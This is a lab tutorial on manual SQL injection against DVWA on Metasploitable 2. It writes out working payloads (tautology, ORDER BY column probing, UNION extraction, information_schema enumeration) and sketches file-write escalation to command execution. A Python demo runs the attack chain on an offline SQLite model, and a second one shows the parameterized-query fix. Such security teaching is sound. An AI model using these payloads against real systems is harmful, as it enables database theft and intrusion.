This post is a tutorial focused on explaining SQL Injection (SQLi) attacks using manual methods without relying on automated tools. The demonstration is conducted on the Damn Vulnerable Web Application (DVWA) running on Metasploitable 2 Linux. The tutorial provides an in-depth guide on identifying and exploiting SQL injection vulnerabilities step-by-step.

Introduction to SQL Injection

  • SQL Injection allows attackers to manipulate database queries by inserting malicious input.
  • Common targets include login forms, search boxes, and any input fields interacting with databases.

Difference Between Manual and Automated Testing

  • Automated Testing is more efficient for large-scale assessments across many targets.
  • Manual Testing is preferred for detailed examination of one or two targets.

Initial Testing for SQL Injection

  • DVWA's SQL injection page takes a numeric User ID. Entering a simple value such as 1 returns that user's record, which shows that the input drives a database lookup.
  • The backend query resembles the following, with the supplied value enclosed in single quotes (this is why the payloads later in the post start with a quote):
SELECT * FROM users WHERE id = '1';
  • Changing the input value returns a different record, confirming that the page reads from a database rather than a static list.

Error-Based SQL Injection Detection

  • Inserting a single quote (') into the input breaks the string literal in the query and triggers a syntax error, which shows that the input is concatenated into the SQL unescaped.
  • Verbose error messages often reveal the database type and version (e.g., MySQL, MariaDB) and sometimes the fragment of the query that failed, which tells the tester how to shape the payload.
  • A missing error does not prove the input is safe: an application that suppresses errors may still be injectable (blind SQL injection), so the boolean and UNION tests below are still worth running.

Basic SQL Injection Exploit

  • Injecting a payload such as:
' OR 0=0 -- 
  • closes the string literal, appends a condition that is true for every row, and comments out the rest of the query. The result is every row from the table the query reads, not just the one matching the supplied id. In MySQL the -- comment must be followed by a space, so the trailing space in the payload is part of it.

Understanding the Injection Logic

  • For a login form the injected query looks like:
SELECT * FROM users WHERE username = '' OR 0=0 -- ';
  • The OR 0=0 condition evaluates to true for every row, so the WHERE clause no longer filters anything. Against a login form that means the first matching account is logged in without a password; against DVWA's lookup form it dumps every user row.

Using Comments to Bypass Queries

  • The -- (double dash) sequence comments out the rest of the SQL statement, including the closing quote the application appends after the input, so the injected statement stays syntactically valid. MySQL requires whitespace after --, hence the trailing space in the payloads above; # works as an alternative comment marker in MySQL.

Advanced SQL Injection: UNION-Based Injection

  • UNION SELECT appends the rows of a second, attacker-chosen query to the results of the original one. The injected SELECT must return the same number of columns as the original query, otherwise the database rejects it; the count can be found by increasing n in ' ORDER BY n -- until the page errors. DVWA's lookup returns two columns.
    Example:
' UNION SELECT version(), user() -- 
  • This returns the database version and the account the application connects as, both of which shape the rest of the attack.

Enumerating Database Information

  • MySQL's information_schema database lists every schema, table and column the current account can see, so it can be read through the same UNION to map the database.
    Example:
' UNION SELECT table_name, null FROM information_schema.tables -- 
  • This lists all tables; on a real target the list is long because it includes MySQL's own system tables, so in practice the tester filters on the application's schema, then reads information_schema.columns for the interesting tables (users, for instance) before selecting their contents.
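The manual steps above, from the quote test through the tautology, the column-count probe, UNION and schema enumeration, as an added example that is not part of the original post or of DVWA: a Python model of the DVWA lookup backed by an in-memory SQLite database so it runs offline. The users rows are constructed sample data; sqlite_version() and sqlite_master stand in for MySQL's version()/user() and information_schema, and the function names are mine.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table (not a dump of the real schema).
SEED_ROWS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """In-memory stand-in for the DVWA MySQL database, so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirrors the low-security DVWA lookup: the id is pasted inside single quotes
    with no escaping, which is what makes every payload below work."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def is_injectable(conn):
    """Error-based check: a lone quote breaks the string literal and the engine
    rejects the statement. A real target shows the DB error page instead."""
    try:
        lookup_vulnerable(conn, "'")
    except sqlite3.Error:
        return True
    return False


def dump_all_rows(conn):
    """Tautology payload: WHERE user_id = '' OR 0=0 -- ' returns every row.
    SQLite accepts -- without a following space; MySQL needs the space."""
    return lookup_vulnerable(conn, "' OR 0=0 -- ")


def find_column_count(conn, limit=10):
    """Prerequisite for UNION: the injected SELECT must return the same number of
    columns as the original. ORDER BY n errors once n exceeds that count."""
    for n in range(1, limit + 1):
        try:
            lookup_vulnerable(conn, f"' ORDER BY {n} -- ")
        except sqlite3.Error:
            return n - 1
    return None


def union_extract(conn):
    """UNION with the right column count (two). SQLite has no version()/user(),
    so sqlite_version() and a fixed string stand in for MySQL's functions."""
    return lookup_vulnerable(conn, "' UNION SELECT sqlite_version(), 'no user() in sqlite' -- ")


def enumerate_tables(conn):
    """Schema enumeration. MySQL targets read information_schema.tables;
    SQLite keeps the same information in sqlite_master."""
    rows = lookup_vulnerable(
        conn, "' UNION SELECT name, sql FROM sqlite_master WHERE type='table' -- "
    )
    return [name for name, _ in rows]


if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db))
    print("all rows:", dump_all_rows(db))
    print("columns:", find_column_count(db))
    print("union:", union_extract(db))
    print("tables:", enumerate_tables(db))
```

The column-count probe is the step most often skipped in write-ups: on the real MySQL target a UNION with the wrong number of columns fails with an error about differing column counts, so running the ORDER BY loop first saves guessing.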

Escalation and Further Exploitation

  • What comes next depends on the privileges of the database account the application uses. A high-privileged MySQL account with the FILE privilege can read files from the server with LOAD_FILE() and write files with SELECT ... INTO OUTFILE; writing a PHP file into a web-writable directory turns the injection into command execution and, from there, potentially full system compromise. Newer MySQL versions restrict this with secure_file_priv, which the old MySQL on Metasploitable 2 does not enforce.
  • Knowing the web root path on disk and the privileges of the current database user (user() and its grants) is what decides whether this escalation is possible.

Conclusion and Recommendations

  • Input Validation: validate inputs against the type and format the application expects (a numeric id must be a number). This is a useful second layer, but on its own it does not prevent SQL injection.
  • Parameterized Queries: the primary fix. Prepared statements send user input to the database separately from the SQL text, so quotes and comment markers in the input are never parsed as syntax.
  • Error Handling: return generic error messages to users and keep database errors in server-side logs, so an attacker cannot learn the database type, version or query structure from the response.
  • Least Privilege Principle: the database account the application connects with should hold only the permissions it needs (no FILE privilege, no access to other schemas), which limits what a successful injection can reach.
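The first three recommendations, as an added example that is not code from the post or from DVWA: the same lookup written the vulnerable way and the parameterized way side by side, plus a request handler that validates the id and returns a generic error. An in-memory SQLite database with constructed sample rows stands in for DVWA's MySQL users table; the function and field names are mine.

```python
import logging
import sqlite3

log = logging.getLogger(__name__)

# Constructed sample rows standing in for DVWA's users table.
SEED_ROWS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db():
    """In-memory stand-in for the application database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The DVWA pattern: user input spliced into the SQL text, so a quote in the
    input becomes SQL syntax."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Parameterized query: the driver sends the value separately from the SQL
    text, so quotes and comment markers in user_id are only ever compared as data."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def handle_request(conn, user_id):
    """Web-handler shape: reject input that is not the expected type, run the
    parameterized query, and turn any database exception into a generic response
    while the detail goes only to the server-side log."""
    if not user_id.isdigit():
        return {"status": 400, "body": "invalid user id"}
    try:
        rows = lookup_safe(conn, int(user_id))
    except sqlite3.Error as exc:
        log.error("database error: %s", exc)  # detail stays server-side
        return {"status": 500, "body": "internal error"}
    return {"status": 200, "body": rows}


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 0=0 -- "
    print("vulnerable:", lookup_vulnerable(db, payload))   # every row
    print("parameterized:", lookup_safe(db, payload))      # no rows
    print("handler:", handle_request(db, payload))         # rejected before the query
    print("handler:", handle_request(db, "2"))             # one record
```

The parameterized version returns nothing for the tautology payload because the whole string, quote and comment marker included, is compared against user_id as a value; the type check in the handler rejects it even earlier and never hands it to the database.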

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a cybersecurity content creator and YouTuber.